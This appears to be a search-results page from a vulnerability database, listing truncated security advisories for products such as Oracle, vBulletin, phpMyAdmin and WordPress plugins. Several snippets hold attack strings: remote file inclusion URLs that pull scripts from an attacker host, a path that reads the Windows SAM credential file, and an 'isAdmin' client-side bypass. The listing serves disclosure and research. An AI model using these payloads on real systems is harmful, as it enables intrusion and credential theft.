Lucene search
K
SecurityvulnsMost viewed

47153 matches found

securityvulns
securityvulns
added 2010/01/28 12:0 a.m.137 views

[RT-SA-2010-003] Geo++(R) GNCASTER: Faulty implementation of HTTP Digest Authentication

Advisory: Geo++R GNCASTER: Faulty implementation of HTTP Digest Authentication During a penetration test, RedTeam Pentesting discovered that the GNCaster software has multiple bugs in its implementation of HTTP Digest Authentication. Details ======= Product: Geo++R GNCASTER Affected Versions: =...

0.1AI score
Exploits0
securityvulns
securityvulns
added 2009/11/30 12:0 a.m.137 views

Oracle multiple security vulnerabilities

Oracle quarterly Critical Patch Update fixes approximately 40 vulnerabilities in different Oracle products...

10CVSS2.3AI score0.76361EPSS
Exploits15References6Affected Software10
securityvulns
securityvulns
added 2009/02/07 12:0 a.m.137 views

[security bulletin] HPSBPI02398 SSRT080166 rev.1 - Certain HP LaserJet Printers, HP Color LaserJet Printers, and HP Digital Senders, Remote Unauthorized Access to Files

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c01623905 Version: 1 HPSBPI02398 SSRT080166 rev.1 - Certain HP LaserJet Printers, HP Color LaserJet Printers, and HP Digital Senders, Remote Unauthorized Access to Files NOTICE: The information in...

7.8CVSS6.2AI score0.03514EPSS
Exploits0
securityvulns
securityvulns
added 2009/01/16 12:0 a.m.137 views

Digital Security Research Group [DSecRG] Advisory #DSECRG-09-001

Digital Security Research Group DSecRG Advisory DSECRG-09-001 Application: Oracle Application Server SOA Versions Affected: Oracle Application Server SOA version 10.1.3.1.0 Vendor URL: http://www.oracle.com Bugs: XSS Exploits: YES Reported: 10.01.2008 Vendor response: 11.01.2008 Date of Public...

5.5CVSS8.8AI score0.01018EPSS
Exploits1
securityvulns
securityvulns
added 2008/07/07 12:0 a.m.137 views

[SECURITY] [DSA 1602-1] New pcre3 packages fix arbitrary code execution

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - ------------------------------------------------------------------------ Debian Security Advisory DSA-1602-1 [email protected] http://www.debian.org/security/ Florian Weimer July 05, 2008 http://www.debian.org/security/faq -...

7.5CVSS0.5AI score0.06726EPSS
Exploits3
securityvulns
securityvulns
added 2008/06/16 12:0 a.m.137 views

SMF <= 1.1.4 COOKIE[topic] SQL-Injection Exploit

Здравствуйте, Зараза. Поддержим отечественного произодителя. SMF = 1.1.4 COOKIEtopic SQL-Injection Exploit www.simplemachines.org Уязвимость заключается в неопределенном параметре $topic. Атакующий может определить его значение и выполнить произольный SQL-запрос в базу данных приложения...

0.9AI score
Exploits0
securityvulns
securityvulns
added 2008/03/26 12:0 a.m.137 views

Mozilla Foundation Security Advisory 2008-13

Mozilla Foundation Security Advisory 2008-13 Title: Multiple XSS vulnerabilities from character encoding Impact: Moderate Announced: March 25, 2008 Reporter: Alexey Proskuryakov, Yosuke Hasegawa, Simon Montagu Products: Firefox, Thunderbird, SeaMonkey Fixed in: Firefox 2.0.0.12 Thunderbird 2.0.0....

4.3CVSS1.8AI score0.0162EPSS
Exploits1
securityvulns
securityvulns
added 2007/04/19 12:0 a.m.137 views

com_mosmedia for Mambo & Jommla <= Remote File Include Vulnerability

commosmedia for Mambo & Jommla = Remote File Include Vulnerability - Exloit : - /components/commosmedia/media.tab.php?mosConfigabsolutepath=r57.txt? - /components/commosmedia/media.divs.php?mosConfigabsolutepath=r57.txt? - Page Script : -...

0.6AI score
Exploits0
securityvulns
securityvulns
added 2006/07/06 12:0 a.m.137 views

vBulletin 3.5.4 (install_path) Exploit

vBulletin 3.5.4 installpath Exploit - by: CarcaBot - application : vbulletin - URL : http://www.vbulletin.com - Exploit: www.vicitimsite.com/forumpath/install/upgrade301.php?step=http://CarcaBot.Ro - More Details: Dump SQL DB named user then u have access at all md5 users passwords...

1.4AI score
Exploits0
securityvulns
securityvulns
added 2002/10/04 12:0 a.m.137 views

SSL protection bypass in Ximian Evolution

Insufficient certificate check on restored connection...

3.9AI score
Exploits0References1Affected Software1
securityvulns
securityvulns
added 2015/04/08 12:0 a.m.136 views

APPLE-SA-2015-04-08-1 Safari 8.0.5, Safari 7.1.5, and Safari 6.2.5

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 APPLE-SA-2015-04-08-1 Safari 8.0.5, Safari 7.1.5, and Safari 6.2.5 Safari 8.0.5, Safari 7.1.5, and Safari 6.2.5 are now available and address the following: Safari Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, and OS X Yosemite...

6.8CVSS0.9AI score0.09964EPSS
Exploits2
securityvulns
securityvulns
added 2014/05/05 12:0 a.m.136 views

phpMyBackupPro-2.4 Cross-Site Scripting vulnerability

phpmybackuppro Cross-Site Scripting vulnerability @@@ @@@@@@@@@@@ @@@@@ @@@@@@@@@@ @@@ @@@@@@@ @@@ @@@@@@@@@@@ @@@ @@ @@@ @@ @@@ @@@@@@@@ @@@ @@@ @@@ @@ @@@ @@ @@@ @@@ @@@ @@@ @@@ @@@ @@ @@@ @@ @@@ @@@ @@@ @@@ @@@@@@@@@@@ @@@ @ @@@@@@@@@@ @@@ @@@@@@ @@@ @@@@@@@@@@@ @@@ @@ @@@ @@ @@@ @@@@@@ @@@ @@...

0.9AI score
Exploits0
securityvulns
securityvulns
added 2013/10/13 12:0 a.m.136 views

Wordpress Cart66 Plugin 1.5.1.14 Multiple Vulnerabilities

Exploit Title: Wordpress Cart66 Plugin 1.5.1.14 Multiple Vulnerabilities Exploit Author: absane Blog: http://blog.noobroot.com Discovery date: September 29th 2013 Vendor notified: September 29th 2013 Vendor fixed: October 2 2013 Vendor Homepage: http://cart66.com Software Link:...

6.8CVSS0.3AI score0.04084EPSS
Exploits7
securityvulns
securityvulns
added 2013/05/04 12:0 a.m.136 views

Oracle / Sun / MySQL / PeopleSoft multiple applications security vulnerabilities

128 vulnerabilities in different application...

10CVSS2.4AI score0.58817EPSS
Exploits32References4Affected Software24
securityvulns
securityvulns
added 2012/07/09 12:0 a.m.136 views

Bookmark4U lostpasswd.php env[include_prefix] Parameter RFI

vendor - http://bookmark4u.sourceforge.net/ version - 2.1 solution - product discontinued example - http://target/bookmark4u/lostpasswd.php?env5Bincludeprefix5D=http://attacker/path/to/file.txt???...

1AI score
Exploits0
securityvulns
securityvulns
added 2011/11/06 12:0 a.m.136 views

Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc...

7.5CVSS1.6AI score0.51891EPSS
Exploits5References17Affected Software12
securityvulns
securityvulns
added 2011/08/01 12:0 a.m.136 views

[USN-1181-1] libsoup2.4 vulnerability

========================================================================== Ubuntu Security Notice USN-1181-1 July 28, 2011 libsoup2.4 vulnerability ========================================================================== A security issue affects these releases of Ubuntu and its derivatives: -...

5CVSS0.4AI score0.01925EPSS
Exploits0
securityvulns
securityvulns
added 2011/02/15 12:0 a.m.136 views

R7-0038: Check Point Endpoint Security Server Information Disclosure

R7-0038: Check Point Endpoint Security Server Information Disclosure February 7, 2011 -- Vulnerability Details: The Check Point Endpoint Security Server and Integrity Server products inadvertently expose a number of private directories through the web interface. These directories include the SSL...

0.1AI score
Exploits0
securityvulns
securityvulns
added 2010/12/24 12:0 a.m.136 views

MyBB 1.6 <= SQL Injection Vulnerability

================================= MyBB 1.6 = SQL Injection Vulnerability ================================= 1. OVERVIEW Potential SQL Injection vulnerability was detected in MyBB. 2. APPLICATION DESCRIPTION MyBB is a free bulletin board system software package developed by the MyBB Group. It's...

Exploits0
securityvulns
securityvulns
added 2010/03/11 12:0 a.m.136 views

[XSS] i found a xss on "page" parameter in "eccredit.php" in Dvbbs < 8.3.0

Home Page : http://www.dvbbs.net/ Dvbbs is prone to an cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the...

0.7AI score
Exploits0
securityvulns
securityvulns
added 2007/05/14 12:0 a.m.136 views

Cross-Site Scripting in Adobe RoboHelp 6, Server 6 and X5

Hi, I'd like to inform you about a XSS-vulnerability in Adobe RoboHelp 6, RoboHelp Server 6 and RoboHelp X5. See attached advisory below. I - TITLE Security advisory: Cross-Site Scripting in RoboHelp 6, RoboHelp Server 6 and RoboHelp X5 II - SUMMARY Description: A Cross-Site Scripting Flaw in...

6.4AI score
Exploits0
securityvulns
securityvulns
added 2007/02/21 12:0 a.m.136 views

[Full-disclosure] Blind sql injection attack in INSERT syntax on PHP-nuke <=8.0 Final

Hello, it is my new advisory: Problem:Blind sql injection attack in INSERT syntax Product:PHP-nuke =8.0 Web page:http://phpnuke.org/ Credit:Maciej krasza Kukla @mail:[email protected] homepage:www.krasza.int.pl 1.Description ...PHP-Nuke 8.0 Final version. This version includes a new anti-flood...

0.1AI score
Exploits0
securityvulns
securityvulns
added 2007/02/05 12:0 a.m.136 views

flashChat 4.7.8 Cross Site Scripting Vulnerability

/ Flashchat 4.7.8 / Date of written Advisory: February 04, 2007 Product: Flash Chat = 4.7.8 Vendor: http://tufat.com/ Description: flashChat is a highly customizable PHP/MySQL based chat room script that is easily integrated into a website and mimics IRC in it's command structure Exploits /...

6.9AI score
Exploits0
securityvulns
securityvulns
added 2006/11/22 12:0 a.m.136 views

Etomite CMS 0.6.1.2 Vulnerabilities + ContenNow 1.39 Vulnerabilities + Exploits

Etomite CMS 0.6.1.2 Multiple Vulnerabilities Severity : Medium risk Vendor : www.etomite.org Author : Alfredo Pesoli 'revenge' Secunia Advisory : SA22885 Security Focus BID : 21135 -------------------------------------------------- Description Etomite is a PHP Content Management System, more info...

0.1AI score
Exploits0
securityvulns
securityvulns
added 2006/11/03 12:0 a.m.136 views

[SA22676] Sun Solaris NVIDIA Graphics Driver Buffer Overflow Vulnerability

TITLE: Sun Solaris NVIDIA Graphics Driver Buffer Overflow Vulnerability SECUNIA ADVISORY ID: SA22676 VERIFY ADVISORY: http://secunia.com/advisories/22676/ CRITICAL: Highly critical IMPACT: Privilege escalation, DoS, System access WHERE: From remote OPERATING SYSTEM: Sun Solaris 10...

1.4AI score
Exploits0
securityvulns
securityvulns
added 2006/03/08 12:0 a.m.136 views

[SA19142] Owl Intranet Engine "xrms_file_root" File Inclusion Vulnerability

TITLE: Owl Intranet Engine "xrmsfileroot" File Inclusion Vulnerability SECUNIA ADVISORY ID: SA19142 VERIFY ADVISORY: http://secunia.com/advisories/19142/ CRITICAL: Highly critical IMPACT: System access WHERE: From remote SOFTWARE: Owl Intranet Engine 0.x http://secunia.com/product/1579/...

0.7AI score
Exploits0
securityvulns
securityvulns
added 2003/06/21 12:0 a.m.136 views

phpMyAdmin XSS Vulnerabilities, Transversal Directory Attack , Information Encoding Weakness and Path Disclosures

phpMyAdmin XSS Vulnerabilities, Transversal Directory Attack , Information Encoding Weakness and Path Disclosures -------------------- Product: phpMyAdmin Vendor: phpMyAdmin Development Team Versions: VULNERABLE - 2.5.2 CVS in Development - 2.5.x - 2.4.x - 2.3.x - 2.2.x - 2.1.x - 2.0.x - 1.x.x NO...

7.2AI score
Exploits0
securityvulns
securityvulns
added 2015/10/05 12:0 a.m.135 views

[SYSS-2015-005] Kaspersky Total Security - Authentication Bypass

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Advisory ID: SYSS-2015-005 Product: Kaspersky Total Security KTS Vendor: Kaspersky Lab ZAO Affected Versions: 15.0.1.415 Tested Versions: 15.0.1.415 Vulnerability Type: Authentication Bypass Using an Alternate Path or Channel CWE-288 Risk Level:...

7.1AI score
Exploits0
securityvulns
securityvulns
added 2015/07/20 12:0 a.m.135 views

Backdoor and RCE found in 8 TOTOLINK router models

Hello, Please find a text-only version below sent to security mailing-lists. The complete version on analysing the backdoor in TOTOLINK products is posted here: https://pierrekim.github.io/blog/2015-07-16-backdoor-and-RCE-found-in-8-TOTOLINK-products.html === text-version of the advisory without...

Exploits0
securityvulns
securityvulns
added 2014/12/01 12:0 a.m.135 views

[ MDVSA-2014:228 ] phpmyadmin

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Mandriva Linux Security Advisory MDVSA-2014:228 http://www.mandriva.com/en/support/security/ Package : phpmyadmin Date : November 26, 2014 Affected: Business Server 1.0 Problem Description: Multiple vulnerabilities has been discovered and corrected in...

6.5CVSS6.6AI score0.02725EPSS
Exploits3
securityvulns
securityvulns
added 2014/06/17 12:0 a.m.135 views

[SE-2014-01] Security vulnerabilities in Oracle Database Java VM

Hello All, Security Explorations discovered multiple security issues in the implementation of a Java VM embedded in Oracle Database software 1. Discovered security issues violate many "Secure Coding Guidelines for the Java Programming Language" 2. Most of them demonstrate a well known problem...

Exploits0
securityvulns
securityvulns
added 2013/09/09 12:0 a.m.135 views

[SECURITY] [DSA 2740-1] python-django security update

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 - ------------------------------------------------------------------------- Debian Security Advisory DSA-2740-1 [email protected] http://www.debian.org/security/ Salvatore Bonaccorso August 23, 2013 http://www.debian.org/security/faq -...

1.5AI score
Exploits0
securityvulns
securityvulns
added 2013/04/08 12:0 a.m.135 views

SEC Consult SA-20130403-0 :: Multiple vulnerabilities in Sophos Web Protection Appliance

SEC Consult Vulnerability Lab Security Advisory 20130403-0 ======================================================================= title: Multiple vulnerabilities product: Sophos Web Protection Appliance vulnerable version: = 3.7.8.1 fixed version: 3.7.8.2 impact: Critical CVE number:...

9.3CVSS1AI score0.7099EPSS
Exploits12
securityvulns
securityvulns
added 2012/10/28 12:0 a.m.135 views

HP/H3C / Huawei equipment information leakage

Information leakage via SNMP...

8.5CVSS1.8AI score0.02263EPSS
Exploits0References2
securityvulns
securityvulns
added 2011/12/04 12:0 a.m.135 views

Wordpress skysa-official plugin Cross-Site Scripting Vulnerabilities

a bug in Wordpress skysa-official plugin that allows to us to occur a Cross-Site Scripting on a Remote machin. Islamic Republic Of Iran Security Team http://irist.ir/forum/ Wordpress skysa-official plugin Cross-Site Scripting Vulnerabilities Download......:...

0.1AI score
Exploits0
securityvulns
securityvulns
added 2011/08/27 12:0 a.m.135 views

Warah Agencia (productos.php?categoria_id) Remote SQL injection Vulnerability

IRANIAN THE BEST HACKERS IN THE WORLD Remote SQL injection Vulnerability Warah Agencia productos.php?categoriaid AuTh0r : EhsanHp200 H0ME : www.ehsanhp.blogsky.com Email : [email protected] Vendor : http://www.warah.com.ar/ Persian Gulf 4 Ever! Dork : "DESIGN BY WARAH AGENCIA CREATIVA"...

3.3AI score
Exploits0
securityvulns
securityvulns
added 2011/05/05 12:0 a.m.135 views

[RT-SA-2011-004] Client Side Authorization ZyXEL ZyWALL USG Appliances Web Interface

Advisory: Client Side Authorization ZyXEL ZyWALL USG Appliances Web Interface The ZyXEL ZyWALL USG appliances perform parts of the authorization for their management web interface on the client side using JavaScript. By setting the JavaScript variable "isAdmin" to "true", a user with limited acce...

1AI score
Exploits0
securityvulns
securityvulns
added 2011/04/05 12:0 a.m.135 views

HTB22914: Local File Inclusion in UseBB

Vulnerability ID: HTB22914 Reference: http://www.htbridge.ch/advisory/localfileinclusioninusebb.html Product: UseBB Vendor: UseBB http://www.usebb.net/ Vulnerable Version: 1.0.11 Vendor Notification: 22 March 2011 Vulnerability Type: Local File Inclusion Risk level: Medium Credit: High-Tech Bridg...

0.1AI score
Exploits0
securityvulns
securityvulns
added 2010/09/20 12:0 a.m.135 views

n.runs-SA-2010.001 - Alcatel-Lucent - unauthenticated administrative access to CTI CCA Server

n.runs AG http://www.nruns.com/ securityatnruns.com n.runs-SA-2010.001 20-September-2010 Vendor: Alcatel Affected Products: Versions before 9.0.8.4 of the CCAgent option of OmniTouch Contact Center Standard Edition Vulnerability: unauthenticated administrative access to CTI CCA Server Risk: High...

7.6CVSS0.2AI score0.01075EPSS
Exploits0
securityvulns
securityvulns
added 2010/06/25 12:0 a.m.135 views

Mozilla Foundation Security Advisory 2010-30

Mozilla Foundation Security Advisory 2010-30 Title: Integer Overflow in XSLT Node Sorting Impact: Critical Announced: June 22, 2010 Reporter: Martin Barbella Products: Firefox, Thunderbird, SeaMonkey Fixed in: Firefox 3.6.4 Firefox 3.5.10 Thunderbird 3.0.5 SeaMonkey 2.0.5 Description Security...

9.3CVSS1.3AI score0.11418EPSS
Exploits5
securityvulns
securityvulns
added 2010/05/28 12:0 a.m.135 views

PR10-02: Various XSS and information disclosure flaws within 3Com* iMC (Intelligent Management Center)

PR10-02: Various XSS and information disclosure flaws within 3Com iMC Intelligent Management Center On the 12th April 2010 Hewlett Packard completed its acquisition of 3Com Vulnerability found: 29th January 2010 Vendor informed: 1st February 2010 Vulnerability fixed: 13th May 2010 Severity:...

7AI score
Exploits0
securityvulns
securityvulns
added 2009/09/15 12:0 a.m.135 views

vBulletin 3.8.2 Denial of Service Exploit

!usr/bin/perl vBulletin® Version 3.8.2 D3n14l 0f S3rv1c3 Expl01t HaCker Anger - [email protected] Modules use IO::SOCKET; Object interface if @ARGV1 print" Author : Hacker Anger TeaM : The Assassin Scorpion TeaM Home : http://Baloma.NeT Mail : [email protected] -vBulletin 3.8.2 Denial of Service Exploi...

0.4AI score
Exploits0
securityvulns
securityvulns
added 2009/01/09 12:0 a.m.135 views

FreeBSD Security Advisory FreeBSD-SA-09:01.lukemftpd

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ============================================================================= FreeBSD-SA-09:01.lukemftpd Security Advisory The FreeBSD Project Topic: Cross-site request forgery in lukemftpd8 Category: core Module: lukemftpd Announced: 2009-01-07...

7.5CVSS6.2AI score0.04045EPSS
Exploits1
securityvulns
securityvulns
added 2008/06/19 12:0 a.m.135 views

CA ARCserve Backup Discovery Service Denial of Service Vulnerability

Title: CA ARCserve Backup Discovery Service Denial of Service Vulnerability CA Advisory Date: 2008-06-17 Reported By: Luigi Auriemma Impact: A remote attacker can cause a denial of service. Summary: CA ARCserve Backup contains a vulnerability in the Discovery service casdscsvc that can allow a...

5CVSS6.3AI score0.03634EPSS
Exploits1
securityvulns
securityvulns
added 2008/04/15 12:0 a.m.135 views

S21SEC-043-en:Cezanne SW Blind SQL Injection

S21Sec Advisory - Title: Cezanne SW login required Blind SQL Injection ID: S21SEC-043-en Severity: High History: 02.Jan.2008 Vulnerability discovered Authors: Juan de la Fuente Costa [email protected] Fco Javier Puerta Rubio [email protected] URL: http://www.s21sec.com/avisos/s21sec-43-en.txt...

Exploits0
securityvulns
securityvulns
added 2007/07/23 12:0 a.m.135 views

Webspell 4.x Local File Inclusion

muH - $Title: Webspell 4.x Local File Inclusion Win $Damage Factor: Medium - High $Requires: Win Box & Php Supporting 00 $Discovered by muH $Usage: http://server.com/index.php?site=c:windowsrepairsam00...

7.2AI score
Exploits0
securityvulns
securityvulns
added 2007/05/02 12:0 a.m.135 views

Sendcard (sendcard.php) Sendcard Local File Inclusion Vulnerability

Sendcard sendcard.php Sendcard Local File Inclusion Vulnerability Discovered: ettee Dork: "Powered by sendcard - an advanced PHP e-card program" -site:sendcard.org "powered by Sendcard" Bug: "// Get the template details if!isset$form || $form == '' $form = "form"; if!isset$des || $des == '' $des ...

7.2AI score
Exploits0
securityvulns
securityvulns
added 2005/10/01 12:0 a.m.135 views

[SECURITY] [DSA 829-1] New mysql packages fix arbitrary code execution

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - -------------------------------------------------------------------------- Debian Security Advisory DSA 829-1 [email protected] http://www.debian.org/security/ Martin Schulze September 30, 2005 http://www.debian.org/security/faq -...

4.6CVSS0.3AI score0.02328EPSS
Exploits0
securityvulns
securityvulns
added 2005/02/14 12:0 a.m.135 views

Infostring crash and shutdown in the Quake 3 engine

Luigi Auriemma Application: Quake 3 engine http://www.idsoftware.com Games: - Call of Duty = 1.5 - Call of Duty: United Offensive = 1.51 - Heavy Metal: F.A.K.K.2 = 1.02 - Quake III Arena = 1.32 - Return to Castle Wolfenstein = 1.41 - Soldier of Fortune II: Double Helix = 1.03 - Star Trek Voyager:...

0.6AI score
Exploits0
securityvulns
securityvulns
added 2005/01/30 12:0 a.m.135 views

Microsoft Windows XP SP2 non-executable memory (DEP) protection bypass

By using small memory regisouns it's possible to place executable code into non-executable memory regions...

3.1AI score
Exploits0References1
Total number of security vulnerabilities5000